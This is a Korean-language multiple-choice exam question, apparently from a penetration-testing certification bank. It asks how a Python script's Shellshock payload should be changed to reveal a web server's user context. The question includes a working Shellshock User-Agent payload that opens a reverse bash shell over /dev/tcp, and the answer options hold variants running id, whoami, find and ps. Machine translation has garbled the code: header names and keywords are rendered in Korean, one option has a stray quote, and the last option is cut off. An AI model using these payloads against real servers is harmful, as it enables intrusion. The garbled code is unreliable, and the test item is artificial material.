모의 침투 테스트가 10.10.1.1에서 취약한 웹 서버를 발견합니다. 그런 다음 테스터는 웹 익스플로잇을 전송하는 Python 스크립트를 편집하고 다음 코드를 발견합니다: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} 다음 중 테스터가 서버가 실행되는 사용자 컨텍스트를 확인하기 위해 스크립트를 수정해야 하는 것은 무엇인가요?
A. 익스플로잇 = {"사용자-에이전트": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. 익스플로잇 = {"사용자-에이전트": "() { 무시;};/bin/bash -i>& find / -perm -4000", "수락": "text/html,application/xhtml+xml,application/xml"}
C. 익스플로잇 = {"사용자-에이전트": "() { 무시;};/bin/sh -i ps -ef" 0>&1", "수락": "text/html,application/xhtml+xml,application/xml"}
D. 익스플로잇 = {"사용자-에이전트": "() { ignored;};/bin/bash -i>& /dev/tcp/10